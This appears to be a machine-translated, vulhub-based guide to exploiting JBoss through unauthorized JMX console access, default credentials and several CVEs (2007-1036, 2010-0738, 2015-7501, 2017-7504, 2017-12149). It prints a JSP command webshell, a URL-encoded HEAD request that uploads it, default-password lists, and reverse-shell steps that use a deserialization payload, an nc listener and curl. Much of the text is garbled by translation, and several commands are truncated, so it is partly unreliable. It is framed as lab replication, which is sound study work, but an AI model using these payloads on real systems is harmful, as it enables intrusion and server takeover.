Jboss Vulnerability Replication
Unified Range: /vulhub/jboss
JMX Console Unauthorized Access Vulnerability
# Introduction
JBoss webUI interface http://ip:port/jmx-consoleUnauthorized access (or default password admin/admin)
This can lead to the disclosure of JBoss deployment management information, and the attacker can also directly upload a * horse to obtain the webshell.
Vulnerability Discovery
interviewshttp://ip:port/jmx-console
Vulnerability if direct access or weak password login is possible
Remote deployment of WAR packages
- Find the option (Jboss comes with the deployment function) in the flavor=URL,type=DeploymentScanner point in (through the url of the way to deploy remotely)
- Go to the page and find the addURL
- Deploying war packages on vps
# Package the jsp horse as a war package
jar-cvf
# Start the web service on the vps
python3 -m
# Enter the address of the war package request
http://your-ip:8000/
- Then click on the
BacktoMBeanView
Come to the URLList to see if the Value value has been deployed, and finally click theApply Changes
- come (or go) back
jmx-console
Catalog foundCheck for the presence of the WAR * we deployed
- Access:
http://your-ip/shell/
Just connect the ant-sword.
Jboss weak password Getshell
JBoss Administration Console
There exists a default account password to log in, deploy the war package getshell in the backend
# jboss weak password
admin/admin
jboss/admin
admin/jboss
admin/123456
admin/password
- strike (on the keyboard)
Administration Console
If you want to use the default account, enter the default account number.admin/vulhub
Access to the back office
- Once inside, find the
web Application (WAR)
ClickAdd a new resource
Deploying a WAR package (* Horse)
- interviews
http://your-ip:8080/cmd/
Ant Sword Connection
CVE-2007-1036
The /jmx-console/HtmlAdaptor path in JBoss is open to the public and does not have any authentication mechanism , resulting in an attacker can enter the JMx console and perform any function in it .
The vulnerability utilizes the ->DeploymentFileRepository-〉store() method in the backend to upload shells by passing information to four parameters
p1 is the name of the deployed war package, p2 is the filename of the uploaded file, p3 is the file format of the uploaded file, and p4 is the content of the uploaded file. By controlling these four parameters, you can upload a shell and control the whole server. p2 and p3 can be spliced, for example, p2=she, p3=. This time the server will still do the splicing and will pass in the specified path.
- Visit the following URL to determine the store() method
http: //your-ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=:service=DeploymentFileRepository
- Deploying war packages
- p1 is: the name of the deployed WAR package
- p2 is: the filename of the uploaded file
- p3 is: file format of uploaded files
- p4 is: content in uploaded files (jsp *)
<%@ page import=".*" %>
<% String cmd = ("cmd"); String output = ""; if(cmd != null) { String s
= null; try { Process p = ().exec(cmd); BufferedReader sI = new BufferedRe
ader(new InputStreamReader(())); while((s = ()) != null) { output
+= s +"\r\n"; } } catch(IOException e) { (); } } (output);%>
- interviews
http://your-ip:8080/job1/
can immediately (do sth)
CVE-2010-0738 (JMX Console security certification bypass)
The principle of utilization is the same as CVE-2007-1036, except that the HEAD request method is used to bypass the restrictions of GET and P0ST requests.
Affected Versions: jboss4.2.0-jboss4.3.0
- A packet grabber replaces the GET request with HEAD, constructing the following request header
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=%3Aservice%3DDeploymentFileRep
ository&methodIndex=5&arg0=..//&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20%70%61%
67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%20%25%3e%20%0d%0a%3c%25%20%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%3b%20%53%74%72%69%6e%67%20%6f%75%74%70%75%74%20%3d%20%22%22%3b%20%69%66%28%63%6d%64%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%73%20%3d%20%6e%75
%6c%6c%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%63%6d%64%29%3b%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%73%49%20%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72
%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%77%68%69%6c%65%28%28%73%20%3d%20%73%49%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%70%75%74%20%2b%3d%20%73%20%2b%22%5c%72%5c%6e%22%3b%20%7d%20%7d%20%63%61%74%63%68%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%20%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%20%7d%20%
7d%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6f%75%74%70%75%74%29%3b%25%3e&arg4=True HTTP/1.1
- arg3 is a jsp *, only the URL is encoded.
- interviews
http://your-ip:8080/jmx-console/?cmd=id
CVE-2015-7501 (JMXInvokerServlet Deserialization Vulnerability)
Java deserialization error type, present in the ReadOnlyAccessFilter filter in the HttpInvoker component of Jboss attempts to deserialize the data stream from the client without any security checks, with a very wide impact
The vulnerability is caused by jboss reading an object passed in by the user in an /invoker/JMXInvokerServlet request.
Vulnerability Discovery
interviewshttp://ip:port/invoker/JMXInvokerServlet
A vulnerability exists if a downloaded file appears
exploit
- downloading
JavaDeserH2HC
git clone /joaomatosf/
cd JavaDeserH2HC
- Compiling files and using tools
# Compile the file
javac -cp . :commons-collections-3.2.
# Generate deserialized strings with tools
java -cp . :commons-collections-3.2. ReverseShellCommonsCollectionsHashMap attacker ip:port
- Listen on port 6666 and use curl to pass the generated file to Jboss.
# Listening
nc-lvvp 6666.
# Transfer a malicious string for Jboss to deserialize
curl http://target drone-ip:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollecti
- Bounce shell succeeded!
CVE-2017-7504 (JBossMQ JMS deserialization vulnerability)
The CVE-2017-7504 vulnerability is similar in principle to the vulnerability in CVE-2015-7501, except that the path of exploitation has slightly changed, and CVE-2017-7504 appears under the /jbossmq-httpil/HTTPServerILServlet path.
Scope of impact: JBoss AS and previous versions
Vulnerability Discovery
interviews/jbossmq-httpil/HTTPServerILServlet
If the following screen appears, a vulnerability exists
exploit
Continue to utilizeJavaDeserH2HC
Remember to open port 6666 for the attacker.
# Use the previous vulnerability to generate a deserialized string already, just use curl directly
curl http://target drone-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @
- Success!
CVE-2017-12149 (JbossApplicationServer deserialization command execution vulnerability)
Same as above, path changed to /invoker/readonly
Scope: JBoss -
Vulnerability Discovery
interviews/invoker/readonly
If the following error message with status code 500 is returned, the vulnerability exists.
exploit
- Continue to utilize
JavaDeserH2HC
curl http://target drone-ip:8080/invoker/readonly --data-binary @
- Here comes the shell.